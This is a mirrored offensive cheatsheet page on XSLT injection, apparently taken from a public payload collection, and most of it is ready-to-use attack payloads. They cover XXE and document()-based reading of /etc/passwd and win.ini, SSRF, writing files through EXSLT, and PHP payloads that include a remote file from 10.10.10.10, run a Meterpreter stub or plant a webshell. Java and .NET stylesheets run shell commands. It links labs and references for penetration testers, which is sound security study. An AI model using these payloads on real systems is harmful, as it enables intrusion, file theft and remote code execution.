daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

index.md (9351B)


      1 ---
      2 title: "XSLT Injection"
      3 topic: "XSLT Injection"
      4 topicSlug: "xslt-injection"
      5 sourcePath: "XSLT Injection/README.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/XSLT%20Injection/README.md"
      7 sha: "3ac27901c711"
      8 isReadme: true
      9 ---
     10 
     11 # XSLT Injection
     12 
     13 > Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code
     14 
     15 ## Summary
     16 
     17 - [Tools](#tools)
     18 - [Methodology](#methodology)
     19     - [Determine the Vendor And Version](#determine-the-vendor-and-version)
     20     - [External Entity](#external-entity)
     21     - [Read Files and SSRF Using Document](#read-files-and-ssrf-using-document)
     22     - [Write Files with EXSLT Extension](#write-files-with-exslt-extension)
     23     - [Remote Code Execution with PHP Wrapper](#remote-code-execution-with-php-wrapper)
     24     - [Remote Code Execution with Java](#remote-code-execution-with-java)
     25     - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net)
     26 - [Labs](#labs)
     27 - [References](#references)
     28 
     29 ## Tools
     30 
     31 No known tools currently exist to assist with XSLT exploitation.
     32 
     33 ## Methodology
     34 
     35 ### Determine the Vendor and Version
     36 
     37 ```xml
     38 <?xml version="1.0" encoding="utf-8"?>
     39 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
     40   <xsl:template match="/fruits">
     41  <xsl:value-of select="system-property('xsl:vendor')"/>
     42   </xsl:template>
     43 </xsl:stylesheet>
     44 ```
     45 
     46 ```xml
     47 <?xml version="1.0" encoding="UTF-8"?>
     48 <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
     49 <body>
     50 <br />Version: <xsl:value-of select="system-property('xsl:version')" />
     51 <br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
     52 <br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
     53 </body>
     54 </html>
     55 ```
     56 
     57 ### External Entity
     58 
     59 Don't forget to test for XXE when you encounter XSLT files.
     60 
     61 ```xml
     62 <?xml version="1.0" encoding="utf-8"?>
     63 <!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "C:\secretfruit.txt">]>
     64 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
     65   <xsl:template match="/fruits">
     66     Fruits &ext_file;:
     67     <!-- Loop for each fruit -->
     68     <xsl:for-each select="fruit">
     69       <!-- Print name: description -->
     70       - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
     71     </xsl:for-each>
     72   </xsl:template>
     73 </xsl:stylesheet>
     74 ```
     75 
     76 ### Read Files and SSRF Using Document
     77 
     78 ```xml
     79 <?xml version="1.0" encoding="utf-8"?>
     80 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
     81   <xsl:template match="/fruits">
     82     <xsl:copy-of select="document('http://172.16.132.1:25')"/>
     83     <xsl:copy-of select="document('/etc/passwd')"/>
     84     <xsl:copy-of select="document('file:///c:/winnt/win.ini')"/>
     85     Fruits:
     86      <!-- Loop for each fruit -->
     87     <xsl:for-each select="fruit">
     88       <!-- Print name: description -->
     89       - <xsl:value-of select="name"/>: <xsl:value-of select="description"/>
     90     </xsl:for-each>
     91   </xsl:template>
     92 </xsl:stylesheet>
     93 ```
     94 
     95 ### Write Files with EXSLT Extension
     96 
     97 EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language. EXSLT, or Extensible Stylesheet Language Transformations, is a set of extensions to the XSLT (Extensible Stylesheet Language Transformations) language.
     98 
     99 ```xml
    100 <?xml version="1.0" encoding="UTF-8"?>
    101 <xsl:stylesheet
    102   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    103   xmlns:exploit="http://exslt.org/common" 
    104   extension-element-prefixes="exploit"
    105   version="1.0">
    106   <xsl:template match="/">
    107     <exploit:document href="evil.txt" method="text">
    108       Hello World!
    109     </exploit:document>
    110   </xsl:template>
    111 </xsl:stylesheet>
    112 ```
    113 
    114 ### Remote Code Execution with PHP Wrapper
    115 
    116 Execute the function `readfile`.
    117 
    118 ```xml
    119 <?xml version="1.0" encoding="UTF-8"?>
    120 <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    121 <body>
    122 <xsl:value-of select="php:function('readfile','index.php')" />
    123 </body>
    124 </html>
    125 ```
    126 
    127 Execute the function `scandir`.
    128 
    129 ```xml
    130 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
    131   <xsl:template match="/">
    132     <xsl:value-of name="assert" select="php:function('scandir', '.')"/>
    133   </xsl:template>
    134 </xsl:stylesheet>
    135 ```
    136 
    137 Execute a remote php file using `assert`
    138 
    139 ```xml
    140 <?xml version="1.0" encoding="UTF-8"?>
    141 <html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
    142 <body style="font-family:Arial;font-size:12pt;background-color:#EEEEEE">
    143   <xsl:variable name="payload">
    144     include("http://10.10.10.10/test.php")
    145   </xsl:variable>
    146   <xsl:variable name="include" select="php:function('assert',$payload)"/>
    147 </body>
    148 </html>
    149 ```
    150 
    151 Execute a PHP meterpreter using PHP wrapper.
    152 
    153 ```xml
    154 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
    155   <xsl:template match="/">
    156     <xsl:variable name="eval">
    157       eval(base64_decode('Base64-encoded Meterpreter code'))
    158     </xsl:variable>
    159     <xsl:variable name="preg" select="php:function('preg_replace', '/.*/e', $eval, '')"/>
    160   </xsl:template>
    161 </xsl:stylesheet>
    162 ```
    163 
    164 Execute a remote php file using `file_put_contents`
    165 
    166 ```xml
    167 <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl" version="1.0">
    168   <xsl:template match="/">
    169     <xsl:value-of select="php:function('file_put_contents','/var/www/webshell.php','&lt;?php echo system($_GET[&quot;command&quot;]); ?&gt;')" />
    170   </xsl:template>
    171 </xsl:stylesheet>
    172 ```
    173 
    174 ### Remote Code Execution with Java
    175 
    176 ```xml
    177   <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
    178     <xsl:template match="/">
    179       <xsl:variable name="rtobject" select="rt:getRuntime()"/>
    180       <xsl:variable name="process" select="rt:exec($rtobject,'ls')"/>
    181       <xsl:variable name="processString" select="ob:toString($process)"/>
    182       <xsl:value-of select="$processString"/>
    183     </xsl:template>
    184   </xsl:stylesheet>
    185 ```
    186 
    187 ```xml
    188 <xml version="1.0"?>
    189 <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:java="http://saxon.sf.net/java-type">
    190 <xsl:template match="/">
    191 <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping IP')" xmlns:Runtime="java:java.lang.Runtime"/>
    192 </xsl:template>.
    193 </xsl:stylesheet>
    194 ```
    195 
    196 ### Remote Code Execution with Native .NET
    197 
    198 ```xml
    199 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:App="http://www.tempuri.org/App">
    200     <msxsl:script implements-prefix="App" language="C#">
    201       <![CDATA[
    202         public string ToShortDateString(string date)
    203           {
    204               System.Diagnostics.Process.Start("cmd.exe");
    205               return "01/01/2001";
    206           }
    207       ]]>
    208     </msxsl:script>
    209     <xsl:template match="ArrayOfTest">
    210       <TABLE>
    211         <xsl:for-each select="Test">
    212           <TR>
    213           <TD>
    214             <xsl:value-of select="App:ToShortDateString(TestDate)" />
    215           </TD>
    216           </TR>
    217         </xsl:for-each>
    218       </TABLE>
    219     </xsl:template>
    220 </xsl:stylesheet>
    221 ```
    222 
    223 ```xml
    224 <?xml version="1.0" encoding="UTF-8"?>
    225 <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    226 xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    227 xmlns:user="urn:my-scripts">
    228 
    229 <msxsl:script language = "C#" implements-prefix = "user">
    230 <![CDATA[
    231 public string execute(){
    232 System.Diagnostics.Process proc = new System.Diagnostics.Process();
    233 proc.StartInfo.FileName= "C:\\windows\\system32\\cmd.exe";
    234 proc.StartInfo.RedirectStandardOutput = true;
    235 proc.StartInfo.UseShellExecute = false;
    236 proc.StartInfo.Arguments = "/c dir";
    237 proc.Start();
    238 proc.WaitForExit();
    239 return proc.StandardOutput.ReadToEnd();
    240 }
    241 ]]>
    242 </msxsl:script>
    243 
    244   <xsl:template match="/fruits">
    245   --- BEGIN COMMAND OUTPUT ---
    246  <xsl:value-of select="user:execute()"/>
    247   --- END COMMAND OUTPUT --- 
    248   </xsl:template>
    249 </xsl:stylesheet>
    250 ```
    251 
    252 ## Labs
    253 
    254 - [Root Me - XSLT - Code execution](https://www.root-me.org/en/Challenges/Web-Server/XSLT-Code-execution)
    255 
    256 ## References
    257 
    258 - [From XSLT code execution to Meterpreter shells - Nicolas Grégoire (@agarri) - July 2, 2012](https://web.archive.org/web/20190820014239/https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html)
    259 - [XSLT Injection - Fortify - January 16, 2021](http://web.archive.org/web/20210116001237/https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection)
    260 - [XSLT Injection Basics - Saxon - Hunnic Cyber Team - August 21, 2019](http://web.archive.org/web/20190821174700/https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/)
    261 - [Getting XXE in Web Browsers using ChatGPT - Igor Sak-Sakovskiy - May 22, 2024](https://web.archive.org/web/20260121165846/https://swarm.ptsecurity.com/xxe-chrome-safari-chatgpt/)
    262 - [XSLT injection lead to file creation - PT SWARM (@ptswarm) - May 30, 2024](https://web.archive.org/web/20241006180803/https://twitter.com/ptswarm/status/1796162911108255974/photo/1)